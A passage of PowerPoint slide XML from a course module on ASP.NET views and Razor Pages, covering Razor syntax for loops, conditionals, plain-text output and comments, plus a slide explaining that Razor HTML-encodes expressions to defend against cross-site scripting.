            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1278214547"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="990600"/>
          <a:ext cx="5638800" cy="4465320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5638800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr marL="0" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr marL="457178" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr marL="914354" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr marL="1371532" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr marL="1828709" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="2285886" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr marL="2743062" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr marL="3200240" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr marL="3657418" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Razor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Syntax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="0C6126"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Code and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0"/>
                        <a:t> markup</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@foreach(var item in items) {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>   &lt;span&gt;Item </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>No.@item.Id</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> &lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="0C6126">
                        <a:tint val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Code and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0"/>
                        <a:t> plain text</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@if(showMessage)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;text&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Text Message.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;/text&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" baseline="0" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Or</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" baseline="0" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@if(showMessage) {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@:Text Message.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="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a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>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727999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Razor Syntax (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2737106592"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="1066800"/>
          <a:ext cx="5638800" cy="1691640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5638800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr marL="0" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr marL="457178" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr marL="914354" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr marL="1371532" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr marL="1828709" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="2285886" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr marL="2743062" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr marL="3200240" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr marL="3657418" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Razor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Syntax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="12083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C6126"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Comments</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>@*</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Multi-line comment</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Product name: @ViewBag.Product</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>*@</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="12083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C6126">
                        <a:tint val="40000"/>
                      </a:srgb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17866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Demo: Razor View Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1712882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Module 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Views &amp; Razor Pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Module Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13793162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Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor expressions are always HTML encoded!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense against Cross-Site Scripting (XSS) attack, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Html.Raw( ) for showing HTML markup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194868" y="2032039"/>
            <a:ext cx="6638492" cy="857417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="3162877"/>
            <a:ext cx="3505200" cy="570923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8583930" y="4684781"/>
            <a:ext cx="2247900" cy="1808094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194868" y="4547944"/>
            <a:ext cx="6638492" cy="821661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Bent-Up Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6063510" y="2851892"/>
            <a:ext cx="598378" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId7"/>
              </a:buBlip>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5" name="Bent-Up Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7711870" y="5310641"/>
